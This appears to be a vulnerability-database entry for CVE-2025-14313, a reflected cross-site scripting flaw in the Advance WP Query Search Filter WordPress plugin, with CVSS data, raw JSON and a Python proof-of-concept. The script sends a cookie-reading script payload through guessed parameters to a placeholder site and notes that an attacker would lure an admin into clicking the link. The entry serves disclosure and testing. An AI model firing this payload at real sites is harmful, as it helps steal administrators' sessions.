Security Vulnerability Report
中文
CVE-2025-14313 CVSS 6.1 MEDIUM

CVE-2025-14313

Published: 2025-12-30 06:15:41
Last Modified: 2026-04-15 00:35:42

Description

The Advance WP Query Search Filter WordPress plugin through 1.0.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Advance WP Query Search Filter WordPress plugin <= 1.0.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-14313 PoC - Reflected XSS in Advance WP Query Search Filter # Target: WordPress site with Advance WP Query Search Filter plugin <= 1.0.10 target_url = "http://target-wordpress-site.com" payload = "<script>alert(document.cookie)</script>" # Try common parameter names used by the plugin params_to_test = [ {"awqsf_search": payload}, {"s": payload}, {"search": payload}, {"awqsf_cat": payload}, ] for params in params_to_test: try: response = requests.get(target_url, params=params, timeout=10) if payload in response.text: print(f"[+] XSS vulnerability confirmed!") print(f"[+] Vulnerable URL: {response.url}") print(f"[+] Payload reflected in response") break except requests.RequestException as e: print(f"[-] Request failed: {e}") print("\n[!] Note: This PoC demonstrates the vulnerability exists.") print("[!] In real attack, attacker would trick admin to click this link.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14313", "sourceIdentifier": "[email protected]", "published": "2025-12-30T06:15:40.800", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Advance WP Query Search Filter WordPress plugin through 1.0.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "references": [{"url": "https://wpscan.com/vulnerability/5ebcdb32-da82-4129-8538-40d1b03a1108/", "source": "[email protected]"}]}}